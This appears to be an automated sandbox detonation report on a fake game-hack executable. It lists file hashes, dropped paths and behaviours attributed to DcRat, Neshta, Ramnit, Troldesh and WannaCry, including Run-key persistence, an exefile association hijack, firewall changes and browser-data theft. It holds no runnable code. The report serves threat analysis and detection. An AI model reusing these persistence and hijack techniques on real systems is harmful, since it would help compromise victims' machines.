SHA256 947d28e57a71ab35c91b6c3efc01734191ac2a488985f2554aa5b980ee53f8be
SHA512 f7c115b4e8f378d30d83d4fe76771984f9fc9556133ffa8ada8ec52fdfcfe171b3f86be12dfd5a66bd6017551f94f08012e21c7f05d238d51e1fb8843d5db595

C:\Windows\directx.sys

MD5 3f80c09d63dcf163cd90af23cacaee53
SHA1 5e7c0ac1a26d01052019f9e3a60e2d8a815e1bb9
SHA256 0aa1dd5b935f4aafb1a1a087ebf7d1193fe944044688677817cf67738c89b685
SHA512 27114198bb096313a03a959034235d6317b190b7cbf88300ca0d41a5da332ea5707223b715a3a4c3cf2b147422c83c38017141a898b4ddd24111170842bebd61

memory/1516-1534-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2824-1536-0x0000000000400000-0x000000000042E000-memory.dmp

C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe

MD5 ff5e1f27193ce51eec318714ef038bef
SHA1 b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6
SHA256 fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320
SHA512 c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

memory/1540-1592-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2320-1595-0x00000000001B0000-0x00000000001B4000-memory.dmp

memory/2928-1596-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2320-1590-0x00000000002B3000-0x00000000002C3000-memory.dmp

memory/2748-1602-0x0000000000400000-0x0000000000416000-memory.dmp

memory/240-1614-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2876-1654-0x0000000000B70000-0x0000000000C04000-memory.dmp

C:\Users\Admin\Desktop\8.exe

MD5 61b32a82577a7ea823ff7303ab6b4283
SHA1 9107c719795fa5768498abb4fed11d907e44d55e
SHA256 4263eacd358d5ef9efacff1f63ff79487639136c0268938755a4bfe3f5797167
SHA512 86ac9d3d0804f5dd3ebe08ab59058363bceeaa3f42d2d482f97ce688837b3b81693fde2b973250b93ee3223318b0f8e4f2faf6b0f91017807feacabce979d700

C:\Windows\directx.sys

MD5 c93ff55f5c5a9e2323b2f5d677bdbee1
SHA1 3e1c36c7d34bafad15e140ce5b03734f6aa87d1d
SHA256 15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc
SHA512 8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a

memory/2844-1856-0x00000000712F0000-0x000000007189B000-memory.dmp

memory/2656-1967-0x000000006846D000-0x0000000068478000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 86f9342b96c7fa7613545602d6132ba4
SHA1 7d3033ef56aba51310d92d4d6cda188a4b792a47
SHA256 d0a2a2e405eca9875394e96c17af5d818657fef62b5b39173e58e8a135502f32
SHA512 5e93a6b5ef097c5f1a85b47f121e9596be2eb38f36551dc5bb27ee4be4f3a3417f99995a813a673c2e614b834a9d2e0e76e287612d82eaa9e0a099a3117ca29a

memory/2324-2008-0x000000006846D000-0x0000000068478000-memory.dmp

C:\ProgramData\system.exe

MD5 e817d74d13c658890ff3a4c01ab44c62
SHA1 bf0b97392e7d56eee0b63dc65efff4db883cb0c7
SHA256 2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d
SHA512 8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

C:\Users\Admin\AppData\Local\Temp\tmp7668.tmp.bat

MD5 26f2b596ad09f70bdab6a51f2d39665f
SHA1 bc5e5a11ed45df29811cb21d8435475071f57f1a
SHA256 365350a3e777fd47be7e6eee89f17b236d9a47a21023243a173fdd7bdcd28efd
SHA512 e0650b1868e9bd65d7bff7c371655229e1dc1f3d25cf6cf84d5ddc17ad26dcb7d1c133e292c1a29cb0d5b805b54ebcf8f7554591edac21739c13416f57c8cf77

memory/2876-2262-0x00000000001D0000-0x00000000001DC000-memory.dmp

memory/2876-2286-0x00000000001F0000-0x00000000001FA000-memory.dmp

memory/2876-2287-0x0000000000200000-0x000000000020C000-memory.dmp

memory/2876-2288-0x0000000000520000-0x000000000052C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 23624d5bc68d72d1fbd1d869926f6b8c
SHA1 874dcfbd040f757eef4e3989d16c1b14b1e16620
SHA256 70373426b70f7c9d69545a8e1f223e2096aeb835091eb5eee1b852a92abe2ab6
SHA512 5e17483656d596914d37c25ac9f97a63610cd03aa2cdf8f59ac2818dcd8ced273fadfe7f228ccd5fe9d928fa29fabe956168c90e55a22262032d6b9d82ec2ffe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 728a9084c02ac93d7ac911aae6f81a5a
SHA1 fc68a8f1cc77ae2f74bb9bab3b85aaaa47021ca3
SHA256 da436752147196a6db0ee4d385bf13c63fcbb7f2069f93000059bc9e22eb678b
SHA512 072d940c7e0af26e8d4fd873f76daf9204284b1a83640c1963c67e55afef8dc097901afa78157ea22320d9588a381759bc266ff5b1908f4278d0902d73d5b800

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 219655b6dffcb062fd1388cd238bcf17
SHA1 2518c78cdff88e4caab6df779cc2df06d9885cd6
SHA256 166dd21b728df59f82f31cea00e7083b3fffb605a0de13e11a962d99f7be12af
SHA512 8028634c4e8a15ef1d9e8d1dddfdc84f76eb58ec2125c247ecdcea6ac8792524bafe948741bb4918d3cb0e3b58904d12ec7e293977c93d56b138089681dcdd94

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3b38ede308735e70e2783656bd78a5e6
SHA1 a053746256397d213cc8fe98258bdbe9705abe33
SHA256 b1c8e5668725dec42c5e0f55e687a33594964dbaf99a3fcbea848047a805911e
SHA512 b765b7e1fb0b6cc94e10a8e993d7509a0f165ca6d497e96791f3e7de210fc4d69d38e413e84895ea0189aadd8add607dda0417fdd2a531353fc18db0cb0967fe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9cdb2916ae772d624dc1f97d15ce12f9
SHA1 a234f356a32d01f741459b25db4a87ada85ccf4f
SHA256 b36d5c016a5a2a591a32320575f822a7f0ed198cb0b6efc2c810bf5906ede3db
SHA512 5686e00fd0c47c5f90838b4c9559c9e8bde60e468d05e384558ceedf28539f586704af93400454a0d26f7306026e9dbe17a59f962f2524efac603dd57ae6e058

C:\ProgramData\freebl3\system.exe

MD5 748a4bea8c0624a4c7a69f67263e0839
SHA1 6955b7d516df38992ac6bff9d0b0f5df150df859
SHA256 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e
SHA512 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d734b923c382ac7b77a1b4fd4951d501
SHA1 7607e5c38bee85f9593c7ffa045c61f695370e14
SHA256 66b80abb3ebebd6f566467c210b7e8baae816aeebff6e846e52787ceb6d67427
SHA512 094acfe9b1c92faddea67a21591405b67570c00c069007b8f87d87218a6ad342180ec3c5d3b24b0e2bcc5c70ff36361ef9ea10862145312645f974263a80fe25

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 93387c2ec4add1e291c0710b885d16cc
SHA1 adf89ebdbcf68a1782265bab164f99b85188743f
SHA256 bc1c70162b9ad1c47181cd533f21841b06655305b5deb3129e92a2ebaabb82a1
SHA512 bdf8fd97cfbb264063602107f85d55cc55cbd09b6fd735ba087d55d8b9a3be8a87b5fe3844e5c2c1ba48c547ece738ac8c0b4531f4fbcb75c6b3e09325ac4125

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 baeec9297c1d3ce4319273d5d4fcaaf8
SHA1 8464cafd1e071dbe1fd4bcc1b631ed12fa676f51
SHA256 e75ef8c52ac6973fdc38bcfd96585923d986b7afab6240f449f99703bec85c8a
SHA512 389fa2518e0db9c00676274212a6a499084268189aa1ced3640821a49be1d7670148f71b864408440a5c914492f9a4fcc2f6372abe97c0ccb7d2979e7b1a9ebd

memory/2020-2686-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

MD5 673f60f6b0be4eedb5b09a13aaf2f276
SHA1 782d78fb7d7bede0a5b9c2c9ca592558987e2830
SHA256 539275b1ecdae910cd8d51c0a58b233927448a807924bbf4a2a2669a12617a3f
SHA512 7a116ce178f4e5c238f31304a9f36a8b3c4e03f8a076d44869f427b9a103d19e15a1eb2008158cf2ad86d553cedf9133dc029821450ca139741f1046e6de0e17

memory/3536-2785-0x0000000000930000-0x0000000000E64000-memory.dmp

C:\Windows\directx.sys

MD5 59c9e2a41f560931ec584bc78d3f2d8d
SHA1 ad2a1b1c986e14a642a2e5660fe3be6948a24e52
SHA256 e929029d1f12e4fe30a18f1378d98140d3e2a72913d62daf70d4579b76c58ee6
SHA512 b9e555ef225ddbf5be4fafb9bb31e9b8c8219565afa25ca7ee12f76c006f2be8f959d7bc8ed043d0224d7c2c4cb2fe2877263d924fc9a96340ca00219b59d80d

C:\Users\Admin\AppData\Roaming\WindowsUpdate.exe

MD5 ed666bf7f4a0766fcec0e9c8074b089b
SHA1 1b90f1a4cb6059d573fff115b3598604825d76e6
SHA256 d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264
SHA512 d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

memory/740-2815-0x0000000000A45000-0x0000000000A5A000-memory.dmp

memory/740-2816-0x0000000000220000-0x000000000023C000-memory.dmp

memory/740-2817-0x0000000000400000-0x0000000000871000-memory.dmp

memory/3368-2938-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1576-2943-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Users\Public\Desktop\@[email protected]

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\AppData\Local\Temp\jobA4AHzPOmu1yZ_cL\8ghN89CsjOW1Login Data For Account

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\jobA4AHzPOmu1yZ_cL\D87fZN3R3jFeWeb Data

MD5 1f41b636612a51a6b6a30216ebdd03d8
SHA1 cea0aba5d98bed1a238006a598214637e1837f3b
SHA256 34e9cb63f4457035e2112ba72a9ea952b990947c9dc8fb7303f4d25735f2c81c
SHA512 05377e24e0077208a09550b7a35a14c3f96d14013aadee71f377450cb3a13ea70a2b85f6af201e1c9502fc1c33e243b1de09de60313fb5be61bc12f6efe57ca8

memory/3536-3005-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jobA4AHzPOmu1yZ_cL\3b6N2Xdh3CYwplaces.sqlite

MD5 727be1698abb145cac6da9e42c798cf7
SHA1 83509b6388edbdabb5b6e76eb004a978825b7c3d
SHA256 eff09705e66c1a2c818b93e2f6606b8408b5d872bba8235497a56649f2dfe965
SHA512 76b46096d46740853594abf199ccbc64fefd87f4b7cb461346c6e3b9ee7e9b4db7fd21f2086e8152b0ef1ef8aa75e9e200e115dfc5ed538820a526a86dce127f

C:\Users\Admin\AppData\Local\Temp\jobA3AHzPOmu1yZ_cL\information.txt

MD5 d799e9102067d4ec5946de4a25f72898
SHA1 a9356b1f7c6ba7276fcddb88f244a11e21d1e9c1
SHA256 5ab6a522312504e8d8c56419b55bebcb8cbd21011a1babf3029f17cbea1062ad
SHA512 ec10cbbcc42580263a0d4cb0d5506b7229b790ee5fb10947f88381d46930b4a5eb00c0d51604adb85c46cae7673feaa08f69a957854b1647807336e4bdf00917

memory/3028-3038-0x00000000010B0000-0x00000000015C6000-memory.dmp

memory/3156-3043-0x00000000002D2000-0x00000000002E2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-09 22:08

Reported

2024-01-09 22:50

Platform

win10-20231215-en

Max time kernel

76s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Neshta

persistence spyware neshta

Ramnit

trojan spyware stealer worm banker ramnit

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

Wannacry

ransomware worm wannacry

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Contacts a large (1100) amount of remote hosts

discovery

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\Desktop\1.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPSP~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I1ATN.tmp\ska2pwej.aeh.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\richedit.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1LPUI.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Windows\svchost.com N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\k: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\v: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\b: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\h: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\i: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\j: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\t: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\g: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\n: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\o: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\s: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\u: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\x: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\a: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\e: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\l: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\m: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\y: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\z: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\p: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\q: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\r: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\w: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4204 set thread context of 2620 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmprph.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\WinMail.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Windows\svchost.com N/A
File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WINDOW~4\ACCESS~1\wordpad.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\setup_wm.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\setup_wm.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpconfig.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\px8A97.tmp C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpconfig.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\WinMail.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpshare.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Windows\svchost.com N/A
File opened for modification C:\Program Files (x86)\Microsoft\px8D66.tmp C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\Windows\csrss.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File created C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpshare.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\ACCESS~1\wordpad.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmlaunch.exe C:\Windows\svchost.com N/A
